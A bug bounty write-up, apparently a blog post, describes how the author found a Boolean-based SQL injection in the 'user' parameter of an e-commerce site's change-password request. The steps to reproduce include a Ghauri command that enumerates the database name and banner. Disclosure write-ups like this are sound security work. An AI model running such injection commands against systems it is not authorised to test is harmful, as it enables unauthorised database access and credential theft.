#4. Bug Bounty Series: Exploiting Boolean-based SQL Injection

Hello guys 👋 I’ve returned with one more article that is Boolean-based SQL Injection through which I was able to get the user credentials.

What is Boolean based SQLi?

Boolean-based SQL injection is a technique that relies on sending an SQL query to the database based on which the technique forces the application to return different results. The result allows an attacker to judge whether the payload used returns true or false. Even though no data from the database are recovered, the results give the attacker valuable information.

Depending on the Boolean result (TRUE or FALSE), the content within the HTTP response will change, or remain the same.

Impacts of SQLi:

Depending on the backend database configuration, access privileges and the operating system, an attacker can mount one or more of the following type of attacks:

• Reading, updating and deleting tables from the database
• Executing commands on the underlying operating system

So as usual I was to exploring the website and understanding the functions used on it. The target application is a e-commerce website. Assuming the target as www.example.com as I’m not allowed to reveal the domain name.

While I was testing the change password functionality, I looked for other vulnerabilities. Then I decided to test it for SQLi on the change password page.

Let’s get to the point now…..😉

Steps to Reproduce:

1. Click on the change password button and submit any dummy information.

2. Open Burpsuite and begin intercepting by selecting the proxy tab.

3. Sent the request to the repeater. Playing around with what’s in offer, I’ve noticed that the user parameter is vulnerable to a SQL injection.

4. So, copied and saved the POST request as burp.txt.

5. To confirm the vulnerability, I used the Ghauri tool (one can use sqlmap as well).
Install the Ghauri SQL Injection tool. Run the following command.

ghauri -r burp.txt -p user -level 3 -risk 3 -current-db -banner

6. After a few minutes, I received the current database name and banner information.

I reported the vulnerability with joy 😍. The issue was considered as a critical; by end of the day, they accepted the finding.

So, that’s it for now and thanks for reading and I appreciate you taking the time to read. For other such writeups do visit the writeups.

If you found it useful, please click the button👏and share it with others who have similar interests! + Feedback is always appreciated!!😊